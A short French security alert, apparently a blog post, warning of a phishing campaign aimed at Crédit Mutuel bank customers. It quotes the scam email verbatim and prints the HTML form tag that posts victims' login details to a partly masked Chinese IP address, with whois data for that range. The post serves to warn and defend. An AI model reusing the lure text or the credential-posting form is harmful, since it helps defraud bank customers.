Une campagne de phishing est en cours, elle vise les clients du crédit mutuel.
Le mail est en deux parties:
1- Un message informant que suite à un “accès non autorisé” (sic) le compte de la cible à été suspendu et qu’il faut rensiegner le formulaire HTML joint pour le réactiver.
Voici le texte original :
En raison de l'accès non autorisé est possible, nous avons temporairement désactivé votre compte. Pour lever la suspension, s'il vous plaît confirmer que votre compte n'a pas été volés. Pour ce faire, s'il vous plaît télécharger et remplir le formulaire ci-joint html. Désolé pour le dérangement, mais votre sécurité est notre top priorité. Cordialement, service clientèle Crédit Mutuel © 2011
On notera la faible qualité de ce message….
2- Un formulaire HTML en pièce jointe qui invite à entrer les informations confidentielles de connexion:
En visualisant les sources, on constate que ce formulaire est posté vers une IP Chinoise :
<form method="post" action="http://61.163.67.9XX/formulaire.php">
route: 61.163.0.0/16
descr: CNC Group CHINA169 Henan Province Network
country: CN
origin: AS4837
mnt-by: MAINT-CNCGROUP-RR